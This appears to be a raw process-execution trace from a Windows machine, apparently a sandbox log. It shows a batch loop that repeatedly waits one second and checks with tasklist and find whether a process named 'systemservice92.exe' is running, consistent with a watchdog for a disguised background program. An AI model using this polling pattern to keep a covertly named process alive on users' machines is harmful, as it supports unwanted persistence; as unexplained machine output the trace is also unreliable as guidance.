timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

